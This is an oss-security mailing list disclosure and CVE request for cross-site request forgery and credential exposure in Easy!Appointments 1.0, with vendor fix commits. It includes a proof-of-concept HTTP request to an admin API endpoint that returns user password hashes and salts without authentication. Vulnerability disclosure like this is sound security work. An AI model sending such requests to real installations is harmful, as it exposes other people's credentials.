|
Message-ID: <20150727131421.GA20274@lakka.kapsi.fi> Date: Mon, 27 Jul 2015 16:14:21 +0300 From: Henri Salo <henri@...v.fi> To: oss-security@...ts.openwall.com Cc: cve-assign@...re.org, Alex Tselegidis <alextselegidis@...il.com> Subject: CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and Insufficiently Protected Credentials vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product: Easy!Appointments Open Source Appointment Scheduler Product URL: http://easyappointments.org/ Vendor: Alex Tselegidis Vulnerability Type: Cross-Site Request Forgery (CWE-352) Insufficiently Protected Credentials (CWE-522) Vulnerable Versions: 1.0 Fixed Version: next release Vendor Notification: 2015-04-03 Solution Status: Fixed by vendor Solution Date: 2015-05-28 Public Disclosure: 2015-07-27 Vulnerability Details: The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. The application transmits all user credentials to unauthenticated user and possibly allows other unauthorized actions. Proof-of-concept without authentication: """ POST /ea/backend_api/ajax_filter_admins HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.6.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://example.com/ea/backend/users Content-Length: 4 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache key= """ Returns: """ HTTP/1.1 200 OK Date: Thu, 09 Apr 2015 10:28:38 GMT Server: Apache/2.2 X-Powered-By: PHP/5.4.39-0+deb7u2 Set-Cookie: ci_session=*removed*; expires=Thu, 09-Apr-2015 12:28:38 GMT; path=/ Keep-Alive: timeout=5, max=500 Connection: Keep-Alive Content-Type: text/html Content-Length: 539 [{"id":"84","first_name":"Henri","last_name":"Salo","email":"email@...mple.com","mobile_number":null,"phone_number":"04012345678","address":null,"city":null,"state":null,"zip_code":null,"notes":null,"id_roles":"1","settings":{"username":"henri","password":"1f40f9a5d17bedf197274fcc1886ef6ef4015b0f883513782d6fa437f8ab9af7","salt":"547ca602bda6a2a97ff4222fb71d61c75436da1ebf86a41c33219d11f1f4568e","working_plan":null,"notifications":"0","google_sync":"0","google_token":null,"google_calendar":null,"sync_past_days":"5","sync_future_days":"5"}}] """ Fixed in following commit: https://github.com/alextselegidis/easyappointments/commit/1f73e7fcbc2c06505178200567ac905ae8570326 Related commits to add CSRF protection: https://github.com/alextselegidis/easyappointments/commit/f223ffa343ad91d046b4469248f6479edf1718d7 https://github.com/alextselegidis/easyappointments/commit/daf4865c290c58b66f73507a0ae1ec41987ad840 https://github.com/alextselegidis/easyappointments/commit/d88c138d2dd35820e355f0d7f3b93db3cc5473e8 https://github.com/alextselegidis/easyappointments/commit/ad8c9b6522c560ac5b6309f62f8b3e2319483d54 https://github.com/alextselegidis/easyappointments/commit/ecbe5600df03ac970e4e743215d3b3be6e1e6860 References: https://scapsync.com/cwe/CWE-352 https://scapsync.com/cwe/CWE-522 https://cwe.mitre.org/data/definitions/352.html https://cwe.mitre.org/data/definitions/522.html https://en.wikipedia.org/wiki/Cross-site_request_forgery https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet - -- Henri Salo -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJVti6tAAoJECet96ROqnV0mlwP/R82KPUH15elyTfqeImCsc/6 FpUiZrvQPvW2saPlweec6vLsdr361dZb3wfSLpltyDK/b/XFhRxGOqufjETDfsrr tP5y7OqvpzKisu+itOpsFBiFppuLD3UCK2GsWyFM0JHrcSkOyG5dKQ1LGkQzZObD vG2U6ofB7PRoW0C9iorlUVa7InUt9sEWojwjsONtacbibiLD4jIqui1YUs0Dg9yj QUTBKd8RcSUddkZYzhKIkhBYgdaMdSO1ObE1taLZlK2lfQCI9L5pAXAf4k8YRP5X N+wiX6LfmVcb+8Os0iJpsFZLT9oe0B3Kl1elm51MWFyA00P5M7B8x3svkeH34LUH OBDyE92+LH352zn9nDIpZFeEwoEZTEZak5zAKM0L1i+qXU9LRwwZXahFvY4VyZng mvqf4tZEogJV55q27HaWr1595b7MEHBexiNQmFrC5k9l2fFzVZRnlaIHLYjGvwpf vSFHG8u/YpSmOOM3FM/yRZlgR21jM2cdYIDs5vpQkGfjdSW61CdQwp6m/j1znkqH jjxYiqIhp9me4xEWmAhgm26HkQcpCHlEBwA2N2x9RvnS/Lw6oPHln8dxhu4OP3mr Eq43X2Zz8kQJkZuQnufAzmtMYxvKmzhfVYWREBzhohox+nXImqlAvYxzCQzBEGBE ++lf9BJDbx+CMendxx9Z =cYYp -----END PGP SIGNATURE-----
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.